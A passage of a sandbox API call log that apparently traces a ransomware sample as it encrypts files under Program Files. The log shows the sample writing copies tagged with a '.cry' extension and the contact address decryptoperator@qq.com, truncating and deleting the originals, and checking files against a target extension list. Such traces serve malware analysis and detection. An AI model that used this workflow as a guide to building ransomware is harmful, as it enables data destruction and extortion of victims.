(lpString1=".1cd", lpString2=".FNT") returned -1 [0052.179] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT") returned 67 [0052.179] lstrlenW (lpString=".jpg") returned 4 [0052.179] lstrcmpiW (lpString1=".jpg", lpString2=".FNT") returned 1 [0052.179] lstrcmpiW (lpString1=".FLT", lpString2=".cry") returned 1 [0052.179] lstrlenW (lpString="PNG32.FLT") returned 9 [0052.179] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PNG32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\png32.flt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x228 [0052.179] GetFileSizeEx (in: hFile=0x228, lpFileSize=0x301ff1c | out: lpFileSize=0x301ff1c*=302976) returned 1 [0052.179] CloseHandle (hObject=0x228) returned 1 [0052.179] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PNG32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\png32.flt")) returned 0x20 [0052.179] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PNG32.FLT.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\png32.flt.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0052.179] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PNG32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\png32.flt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x228 [0052.180] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.180] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.180] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PNG32.FLT.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\png32.flt.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0 [0052.180] GetLastError () returned 0x0 [0052.180] ReadFile (in: hFile=0x228, lpBuffer=0x3b70020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x301fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesRead=0x301fed4*=0x49f80, lpOverlapped=0x0) returned 1 [0052.197] WriteFile (in: hFile=0x1f0, lpBuffer=0x3b70020*, nNumberOfBytesToWrite=0x49f90, lpNumberOfBytesWritten=0x301fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesWritten=0x301fc9c*=0x49f90, lpOverlapped=0x0) returned 1 [0052.202] ReadFile (in: hFile=0x228, lpBuffer=0x3b70020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x301fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesRead=0x301fed4*=0x0, lpOverlapped=0x0) returned 1 [0052.202] WriteFile (in: hFile=0x1f0, lpBuffer=0x3b70020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x301fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesWritten=0x301fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0052.203] SetEndOfFile (hFile=0x1f0) returned 1 [0052.203] CloseHandle (hObject=0x1f0) returned 1 [0052.203] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.203] SetEndOfFile (hFile=0x228) returned 1 [0052.206] CloseHandle (hObject=0x228) returned 1 [0052.206] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PNG32.FLT.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0052.206] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PNG32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\png32.flt")) returned 1 [0052.206] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PNG32.FLT") returned 64 [0052.206] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PNG32.FLT") returned 64 [0052.207] lstrlenW (lpString=".doc") returned 4 [0052.207] lstrcmpiW (lpString1=".doc", lpString2=".FLT") returned -1 [0052.207] lstrlenW (lpString=".docx") returned 5 [0052.207] lstrcmpiW (lpString1=".docx", lpString2="2.FLT") returned -1 [0052.207] lstrlenW (lpString=".pdf") returned 4 [0052.207] lstrcmpiW (lpString1=".pdf", lpString2=".FLT") returned 1 [0052.207] lstrlenW (lpString=".xls") returned 4 [0052.207] lstrcmpiW (lpString1=".xls", lpString2=".FLT") returned 1 [0052.207] lstrlenW (lpString=".xlsx") returned 5 [0052.207] lstrcmpiW (lpString1=".xlsx", lpString2="2.FLT") returned -1 [0052.207] lstrlenW (lpString=".ppt") returned 4 [0052.207] lstrcmpiW (lpString1=".ppt", lpString2=".FLT") returned 1 [0052.207] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PNG32.FLT") returned 64 [0052.207] lstrlenW (lpString=".zip") returned 4 [0052.207] lstrcmpiW (lpString1=".zip", lpString2=".FLT") returned 1 [0052.207] lstrlenW (lpString=".rar") returned 4 [0052.207] lstrcmpiW (lpString1=".rar", lpString2=".FLT") returned 1 [0052.207] lstrlenW (lpString=".bz2") returned 4 [0052.207] lstrcmpiW (lpString1=".bz2", lpString2=".FLT") returned -1 [0052.207] lstrlenW (lpString=".7z") returned 3 [0052.207] lstrcmpiW (lpString1=".7z", lpString2="FLT") returned -1 [0052.207] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PNG32.FLT") returned 64 [0052.207] lstrlenW (lpString=".dbf") returned 4 [0052.207] lstrcmpiW (lpString1=".dbf", lpString2=".FLT") returned -1 [0052.207] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PNG32.FLT") returned 64 [0052.207] lstrlenW (lpString=".1cd") returned 4 [0052.207] lstrcmpiW (lpString1=".1cd", lpString2=".FLT") returned -1 [0052.207] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PNG32.FLT") returned 64 [0052.207] lstrlenW (lpString=".jpg") returned 4 [0052.208] lstrcmpiW (lpString1=".jpg", lpString2=".FLT") returned 1 [0052.208] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PNG32.FLT") returned 64 [0052.208] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PNG32.FLT") returned 64 [0052.208] lstrlenW (lpString=".doc") returned 4 [0052.208] lstrcmpiW (lpString1=".doc", lpString2=".FLT") returned -1 [0052.208] lstrlenW (lpString=".docx") returned 5 [0052.208] lstrcmpiW (lpString1=".docx", lpString2="2.FLT") returned -1 [0052.208] lstrlenW (lpString=".pdf") returned 4 [0052.208] lstrcmpiW (lpString1=".pdf", lpString2=".FLT") returned 1 [0052.208] lstrlenW (lpString=".xls") returned 4 [0052.208] lstrcmpiW (lpString1=".xls", lpString2=".FLT") returned 1 [0052.208] lstrlenW (lpString=".xlsx") returned 5 [0052.208] lstrcmpiW (lpString1=".xlsx", lpString2="2.FLT") returned -1 [0052.208] lstrlenW (lpString=".ppt") returned 4 [0052.208] lstrcmpiW (lpString1=".ppt", lpString2=".FLT") returned 1 [0052.208] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PNG32.FLT") returned 64 [0052.208] lstrlenW (lpString=".zip") returned 4 [0052.208] lstrcmpiW (lpString1=".zip", lpString2=".FLT") returned 1 [0052.208] lstrlenW (lpString=".rar") returned 4 [0052.208] lstrcmpiW (lpString1=".rar", lpString2=".FLT") returned 1 [0052.208] lstrlenW (lpString=".bz2") returned 4 [0052.208] lstrcmpiW (lpString1=".bz2", lpString2=".FLT") returned -1 [0052.208] lstrlenW (lpString=".7z") returned 3 [0052.208] lstrcmpiW (lpString1=".7z", lpString2="FLT") returned -1 [0052.208] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PNG32.FLT") returned 64 [0052.208] lstrlenW (lpString=".dbf") returned 4 [0052.208] lstrcmpiW (lpString1=".dbf", lpString2=".FLT") returned -1 [0052.208] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PNG32.FLT") returned 64 [0052.208] lstrlenW (lpString=".1cd") returned 4 [0052.208] lstrcmpiW (lpString1=".1cd", lpString2=".FLT") returned -1 [0052.208] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PNG32.FLT") returned 64 [0052.208] lstrlenW (lpString=".jpg") returned 4 [0052.208] lstrcmpiW (lpString1=".jpg", lpString2=".FLT") returned 1 [0052.209] lstrcmpiW (lpString1=".FLT", lpString2=".cry") returned 1 [0052.209] lstrlenW (lpString="WPGIMP32.FLT") returned 12 [0052.209] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\WPGIMP32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\wpgimp32.flt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0052.424] GetFileSizeEx (in: hFile=0x204, lpFileSize=0x301ff1c | out: lpFileSize=0x301ff1c*=280448) returned 1 [0052.424] CloseHandle (hObject=0x204) returned 1 [0052.424] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\WPGIMP32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\wpgimp32.flt")) returned 0x20 [0052.424] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\WPGIMP32.FLT.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\wpgimp32.flt.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0052.424] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\WPGIMP32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\wpgimp32.flt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0052.424] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.424] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.424] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\WPGIMP32.FLT.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\wpgimp32.flt.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x220 [0052.425] GetLastError () returned 0x0 [0052.425] ReadFile (in: hFile=0x204, lpBuffer=0x3b70020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x301fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesRead=0x301fed4*=0x44780, lpOverlapped=0x0) returned 1 [0052.454] WriteFile (in: hFile=0x220, lpBuffer=0x3b70020*, nNumberOfBytesToWrite=0x44790, lpNumberOfBytesWritten=0x301fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesWritten=0x301fc9c*=0x44790, lpOverlapped=0x0) returned 1 [0052.459] ReadFile (in: hFile=0x204, lpBuffer=0x3b70020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x301fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesRead=0x301fed4*=0x0, lpOverlapped=0x0) returned 1 [0052.459] WriteFile (in: hFile=0x220, lpBuffer=0x3b70020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x301fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesWritten=0x301fc9c*=0xec, lpOverlapped=0x0) returned 1 [0052.459] SetEndOfFile (hFile=0x220) returned 1 [0052.460] CloseHandle (hObject=0x220) returned 1 [0052.460] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.460] SetEndOfFile (hFile=0x204) returned 1 [0052.462] CloseHandle (hObject=0x204) returned 1 [0052.462] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\WPGIMP32.FLT.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0052.462] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\WPGIMP32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\wpgimp32.flt")) returned 1 [0052.463] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\WPGIMP32.FLT") returned 67 [0052.463] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\WPGIMP32.FLT") returned 67 [0052.463] lstrlenW (lpString=".doc") returned 4 [0052.463] lstrcmpiW (lpString1=".doc", lpString2=".FLT") returned -1 [0052.463] lstrlenW (lpString=".docx") returned 5 [0052.463] lstrcmpiW (lpString1=".docx", lpString2="2.FLT") returned -1 [0052.463] lstrlenW (lpString=".pdf") returned 4 [0052.463] lstrcmpiW (lpString1=".pdf", lpString2=".FLT") returned 1 [0052.463] lstrlenW (lpString=".xls") returned 4 [0052.463] lstrcmpiW (lpString1=".xls", lpString2=".FLT") returned 1 [0052.463] lstrlenW (lpString=".xlsx") returned 5 [0052.463] lstrcmpiW (lpString1=".xlsx", lpString2="2.FLT") returned -1 [0052.463] lstrlenW (lpString=".ppt") returned 4 [0052.463] lstrcmpiW (lpString1=".ppt", lpString2=".FLT") returned 1 [0052.463] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\WPGIMP32.FLT") returned 67 [0052.463] lstrlenW (lpString=".zip") returned 4 [0052.463] lstrcmpiW (lpString1=".zip", lpString2=".FLT") returned 1 [0052.463] lstrlenW (lpString=".rar") returned 4 [0052.463] lstrcmpiW (lpString1=".rar", lpString2=".FLT") returned 1 [0052.463] lstrlenW (lpString=".bz2") returned 4 [0052.463] lstrcmpiW (lpString1=".bz2", lpString2=".FLT") returned -1 [0052.463] lstrlenW (lpString=".7z") returned 3 [0052.463] lstrcmpiW (lpString1=".7z", lpString2="FLT") returned -1 [0052.463] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\WPGIMP32.FLT") returned 67 [0052.463] lstrlenW (lpString=".dbf") returned 4 [0052.463] lstrcmpiW (lpString1=".dbf", lpString2=".FLT") returned -1 [0052.463] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\WPGIMP32.FLT") returned 67 [0052.463] lstrlenW (lpString=".1cd") returned 4 [0052.463] lstrcmpiW (lpString1=".1cd", lpString2=".FLT") returned -1 [0052.463] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\WPGIMP32.FLT") returned 67 [0052.463] lstrlenW (lpString=".jpg") returned 4 [0052.463] lstrcmpiW (lpString1=".jpg", lpString2=".FLT") returned 1 [0052.464] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\WPGIMP32.FLT") returned 67 [0052.464] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\WPGIMP32.FLT") returned 67 [0052.464] lstrlenW (lpString=".doc") returned 4 [0052.464] lstrcmpiW (lpString1=".doc", lpString2=".FLT") returned -1 [0052.464] lstrlenW (lpString=".docx") returned 5 [0052.464] lstrcmpiW (lpString1=".docx", lpString2="2.FLT") returned -1 [0052.464] lstrlenW (lpString=".pdf") returned 4 [0052.464] lstrcmpiW (lpString1=".pdf", lpString2=".FLT") returned 1 [0052.464] lstrlenW (lpString=".xls") returned 4 [0052.464] lstrcmpiW (lpString1=".xls", lpString2=".FLT") returned 1 [0052.464] lstrlenW (lpString=".xlsx") returned 5 [0052.464] lstrcmpiW (lpString1=".xlsx", lpString2="2.FLT") returned -1 [0052.464] lstrlenW (lpString=".ppt") returned 4 [0052.464] lstrcmpiW (lpString1=".ppt", lpString2=".FLT") returned 1 [0052.464] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\WPGIMP32.FLT") returned 67 [0052.464] lstrlenW (lpString=".zip") returned 4 [0052.464] lstrcmpiW (lpString1=".zip", lpString2=".FLT") returned 1 [0052.464] lstrlenW (lpString=".rar") returned 4 [0052.464] lstrcmpiW (lpString1=".rar", lpString2=".FLT") returned 1 [0052.464] lstrlenW (lpString=".bz2") returned 4 [0052.464] lstrcmpiW (lpString1=".bz2", lpString2=".FLT") returned -1 [0052.464] lstrlenW (lpString=".7z") returned 3 [0052.464] lstrcmpiW (lpString1=".7z", lpString2="FLT") returned -1 [0052.464] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\WPGIMP32.FLT") returned 67 [0052.464] lstrlenW (lpString=".dbf") returned 4 [0052.464] lstrcmpiW (lpString1=".dbf", lpString2=".FLT") returned -1 [0052.464] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\WPGIMP32.FLT") returned 67 [0052.464] lstrlenW (lpString=".1cd") returned 4 [0052.464] lstrcmpiW (lpString1=".1cd", lpString2=".FLT") returned -1 [0052.464] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\WPGIMP32.FLT") returned 67 [0052.464] lstrlenW (lpString=".jpg") returned 4 [0052.464] lstrcmpiW (lpString1=".jpg", lpString2=".FLT") returned 1 [0052.465] lstrcmpiW (lpString1=".mui", lpString2=".cry") returned 1 [0052.465] lstrlenW (lpString="tipresx.dll.mui") returned 15 [0052.465] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ar-sa\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0052.526] GetFileSizeEx (in: hFile=0x1f4, lpFileSize=0x301ff1c | out: lpFileSize=0x301ff1c*=3584) returned 1 [0052.526] CloseHandle (hObject=0x1f4) returned 1 [0052.526] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ar-sa\\tipresx.dll.mui")) returned 0x20 [0052.526] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\tipresx.dll.mui.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ar-sa\\tipresx.dll.mui.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0052.527] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ar-sa\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0052.527] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\tipresx.dll.mui") returned 72 [0052.527] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\tipresx.dll.mui") returned 72 [0052.527] lstrlenW (lpString=".doc") returned 4 [0052.527] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0052.527] lstrlenW (lpString=".docx") returned 5 [0052.527] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1 [0052.527] lstrlenW (lpString=".pdf") returned 4 [0052.527] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0052.527] lstrlenW (lpString=".xls") returned 4 [0052.527] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0052.527] lstrlenW (lpString=".xlsx") returned 5 [0052.527] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1 [0052.527] lstrlenW (lpString=".ppt") returned 4 [0052.527] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0052.527] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\tipresx.dll.mui") returned 72 [0052.527] lstrlenW (lpString=".zip") returned 4 [0052.527] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0052.527] lstrlenW (lpString=".rar") returned 4 [0052.527] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0052.527] lstrlenW (lpString=".bz2") returned 4 [0052.527] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0052.527] lstrlenW (lpString=".7z") returned 3 [0052.527] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0052.527] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\tipresx.dll.mui") returned 72 [0052.527] lstrlenW (lpString=".dbf") returned 4 [0052.527] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0052.527] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\tipresx.dll.mui") returned 72 [0052.527] lstrlenW (lpString=".1cd") returned 4 [0052.527] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0052.527] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\tipresx.dll.mui") returned 72 [0052.527] lstrlenW (lpString=".jpg") returned 4 [0052.527] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0052.527] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\tipresx.dll.mui") returned 72 [0052.528] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\tipresx.dll.mui") returned 72 [0052.528] lstrlenW (lpString=".doc") returned 4 [0052.528] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0052.528] lstrlenW (lpString=".docx") returned 5 [0052.528] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1 [0052.528] lstrlenW (lpString=".pdf") returned 4 [0052.528] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0052.528] lstrlenW (lpString=".xls") returned 4 [0052.528] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0052.528] lstrlenW (lpString=".xlsx") returned 5 [0052.528] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1 [0052.528] lstrlenW (lpString=".ppt") returned 4 [0052.528] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0052.528] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\tipresx.dll.mui") returned 72 [0052.528] lstrlenW (lpString=".zip") returned 4 [0052.528] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0052.528] lstrlenW (lpString=".rar") returned 4 [0052.528] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0052.528] lstrlenW (lpString=".bz2") returned 4 [0052.528] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0052.528] lstrlenW (lpString=".7z") returned 3 [0052.528] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0052.528] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\tipresx.dll.mui") returned 72 [0052.528] lstrlenW (lpString=".dbf") returned 4 [0052.528] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0052.528] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\tipresx.dll.mui") returned 72 [0052.528] lstrlenW (lpString=".1cd") returned 4 [0052.528] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0052.528] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\tipresx.dll.mui") returned 72 [0052.528] lstrlenW (lpString=".jpg") returned 4 [0052.528] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0052.528] lstrcmpiW (lpString1=".mui", lpString2=".cry") returned 1 [0052.528] lstrlenW (lpString="tipresx.dll.mui") returned 15 [0052.529] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\bg-bg\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0052.530] GetFileSizeEx (in: hFile=0x1f4, lpFileSize=0x301ff1c | out: lpFileSize=0x301ff1c*=4096) returned 1 [0052.530] CloseHandle (hObject=0x1f4) returned 1 [0052.530] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\bg-bg\\tipresx.dll.mui")) returned 0x20 [0052.530] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\tipresx.dll.mui.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\bg-bg\\tipresx.dll.mui.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0052.530] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\bg-bg\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0052.530] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\tipresx.dll.mui") returned 72 [0052.530] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\tipresx.dll.mui") returned 72 [0052.530] lstrlenW (lpString=".doc") returned 4 [0052.531] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0052.531] lstrlenW (lpString=".docx") returned 5 [0052.531] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1 [0052.531] lstrlenW (lpString=".pdf") returned 4 [0052.531] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0052.531] lstrlenW (lpString=".xls") returned 4 [0052.531] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0052.531] lstrlenW (lpString=".xlsx") returned 5 [0052.531] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1 [0052.531] lstrlenW (lpString=".ppt") returned 4 [0052.531] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0052.531] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\tipresx.dll.mui") returned 72 [0052.531] lstrlenW (lpString=".zip") returned 4 [0052.531] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0052.531] lstrlenW (lpString=".rar") returned 4 [0052.531] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0052.531] lstrlenW (lpString=".bz2") returned 4 [0052.531] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0052.531] lstrlenW (lpString=".7z") 